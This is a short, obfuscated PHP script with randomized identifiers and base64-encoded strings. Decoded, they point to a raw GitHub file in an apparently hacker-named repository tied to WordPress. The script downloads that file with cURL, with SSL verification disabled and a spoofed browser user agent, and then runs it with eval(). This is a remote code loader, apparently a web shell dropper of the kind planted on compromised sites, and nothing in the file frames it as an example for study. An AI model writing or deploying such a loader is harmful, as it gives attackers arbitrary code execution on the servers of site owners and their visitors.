<?php
$GLOBALS["sLErLvRClfMwlwzfmZia"]=base64_decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1Rva3VIYXhvci9Xb3JkcHJlc3MvbWFpbi9zYXNrcmEucGhw");$GLOBALS["voBIXqddThsMvzHcUXzW"]=base64_decode("Y29raQ==");$GLOBALS["TcxoXNboAIbTBtucYEXv"]=base64_decode("TW96aWxsYS81LjAoV2luZG93cyBOVCA2LjE7IHJ2OjMyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMzIuMA==");$GLOBALS["SnsSSwMKZSYeMFnEirnh"]=base64_decode("");
?><?php
function QBBTMsykcviWncPerRkb($gXNjWLFkUQOugyREMXKv){
  $SCvWTGyfCYyeLdjcFFzo = curl_init($GLOBALS["SnsSSwMKZSYeMFnEirnh"].$gXNjWLFkUQOugyREMXKv.$GLOBALS["SnsSSwMKZSYeMFnEirnh"]);
  curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_USERAGENT, $GLOBALS["TcxoXNboAIbTBtucYEXv"]);
  curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_COOKIEJAR,$GLOBALS[$GLOBALS["voBIXqddThsMvzHcUXzW"]]);
  curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_COOKIEFILE,$GLOBALS[$GLOBALS["voBIXqddThsMvzHcUXzW"]]);
  $NUwGojaMFrWOXnaoPPXm = curl_exec($SCvWTGyfCYyeLdjcFFzo);
  return $NUwGojaMFrWOXnaoPPXm;
}

$hvfkNqlpzhXRcuerqjdZ = QBBTMsykcviWncPerRkb($GLOBALS["sLErLvRClfMwlwzfmZia"]);
eval('?>'.$hvfkNqlpzhXRcuerqjdZ); ?>